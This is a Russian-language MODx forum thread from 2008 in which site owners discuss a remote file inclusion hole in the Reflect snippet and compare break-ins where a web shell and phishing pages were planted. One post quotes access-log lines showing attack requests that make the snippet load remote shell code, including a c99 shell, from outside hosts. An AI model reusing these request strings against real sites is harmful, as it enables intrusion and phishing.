We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
    • 14806
    • 72 Posts
    Обсуждение здесь:
    http://modxcms.com/forums/index.php/topic,30850

    Решение, временно переименовать snippet.reflect.php

    Мой сайт подломили вчера, но это была пробная установка, там ничего не было, но враги разместили свой код на сайте.
      • 785
      • 2,113 Posts
      Если я правильно понял обсуждение проблемы, то при установленном register_globals off (как и должно всегда быть) опасности нет.
        Создание сайтов на MODx, поддержка сайтов, поисковая оптимизация, программирование, копирайтинг
        Статьи о MODx, регулярно новые публикации
        • 14806
        • 72 Posts
        К сожалению, на shared хостингах это невозможно.
          • 23695
          • 230 Posts
          пару дней назад увидел в статистике строчки под modx(обычно куча других сканирований на уязвимости), попробовал, не пашут и забил =)
            • 785
            • 2,113 Posts
            Quote from: Joss at Nov 26, 2008, 01:56 AM

            К сожалению, на shared хостингах это невозможно.
            На виртуальных хостингах возможно изменение общих настроек через собственный php.ini или через .htaccess. Если же хостер устанавливает register_globals в on (что открывает дорогу не только этой уязвимости) и запрещает менять данную установку, я бы подумал о смене хостера. Вообще-то у меня был случай, когда на хостинге было установлено register_globals on и что-то менять там отказывались, но в итоге вопрос разрешился после переписки с техподдержкой (они разрешили для моего аккаунта менять настройки в дополнительном php.ini, предупредив, что в случае проблем из-за испорченного этого файла снимают с себя ответственность).
              Создание сайтов на MODx, поддержка сайтов, поисковая оптимизация, программирование, копирайтинг
              Статьи о MODx, регулярно новые публикации
              • 26770
              • 74 Posts
              Quote from: Joss at Nov 25, 2008, 05:46 PM

              Решение, временно переименовать snippet.reflect.php
              Так как я не использую рефлект я его удалил нафиг.

              Quote from: Joss at Nov 25, 2008, 05:46 PM

              Мой сайт подломили вчера, но это была пробная установка, там ничего не было, но враги разместили свой код на сайте.
              в каких файлах?
              У себя никаких изменений не нашел.

              К модераторам, может стоит объеденить этот топик и http://modxcms.com/forums/index.php/topic,30865.0.html?
                • 14806
                • 72 Posts
                По файлам я изменений не смог обнаружить, т.е. хостер оперативно среагировал и заблокировал каталог с assets. Была размещена фишинговая форма.
                  • 26770
                  • 74 Posts
                  Просто у себя по логам я так и не увидел, что куда-то было что-то залито... Просто куча запросов

                  /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://gemobox.net//cache/newid.txt? HTTP/1.0" 404 6567 "-" "libwww-perl/5.811"

                  были конечно и такие

                  /ru/general/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://w7ed.by.ru/c99.txt
                  это как-то нелогично получилось, я настроил дружественные урлы и по ходу взломщики немного пощимились не туда...

                    • 14806
                    • 72 Posts
                    Я посмотрел, в assets/images залит шелл index.php. С помощью него, уже залита фишинговая форма.
                      • 20581
                      • 12 Posts
                      не знаю насколько в тему - один из моих сайтов на модксе тоже ломанули
                      узнал - прислали письмо из [email protected], с топиком "Fraudulent site, please shut down! [St.G 892] Domain: "мойадрес"!!Your website has been HIJACKED!! lipsrsealed
                      вот текст письма:
                      Уважаемые сотрудники,



                      Мы подозреваем, что в отношении вашего вебсайта "мойадрес" совершены мошеннические действия. В настоящее время ваш вебсайт предоставляет некоему лицу ресурсы для осуществления фишинга в отношении St.George.

                      Просим вас немедленно удалить все каталоги и файлы, являющиеся источником мошеннических действий, и предпринять меры для защиты своего вебсайта, безопасность которого в настоящее время находится под угрозой.



                      http://мойадрес/prices/www.stgeorge.com.au/InternetBanking/welcome.jsp/

                      Кроме того, просим вас предоставить нам все исходные файлы-источники мошеннических действий.



                      Если у вас возникнут дополнительные вопросы или вам потребуется помощь, просим вас связаться с нами. Мы будем благодарны вам за сотрудничество.
                      в корень сайта залито 2 папки "web" и "prices", рефлект вроде не заюзан, в "assets/images" шелла index.php нет, зато он есть в /files/ embarrassed
                      чего сделал - переименовал папки и файлы с шелами, включил дружественные урлы, дописал им префикс - в общем пока от дыры не избавился :’(

                      знать бы где она...